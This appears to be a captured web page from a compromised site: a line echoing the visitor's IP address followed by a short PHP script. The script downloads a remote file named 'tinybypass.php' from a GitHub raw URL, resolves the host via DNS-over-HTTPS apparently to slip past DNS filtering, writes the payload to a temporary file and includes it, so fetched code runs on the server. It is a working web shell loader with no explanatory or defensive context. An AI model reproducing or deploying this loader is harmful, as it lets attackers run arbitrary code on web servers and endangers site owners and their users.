Your IP : 216.73.216.168
<?php
set_time_limit(0);
$url = "https://raw.githubusercontent.com/azkagans/azka/refs/heads/main/tinybypass.php";
$dns = "https://cloudflare-dns.com/dns-query";
$ch = curl_init($url);
if (defined("CURLOPT_DOH_URL")) {
curl_setopt($ch, CURLOPT_DOH_URL, $dns);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
$res = curl_exec($ch);
curl_close($ch);
$tmp = tmpfile();
$path_metadata = stream_get_meta_data($tmp);
$path = $path_metadata["uri"];
fprintf($tmp, "%s", $res);
include $path;
?>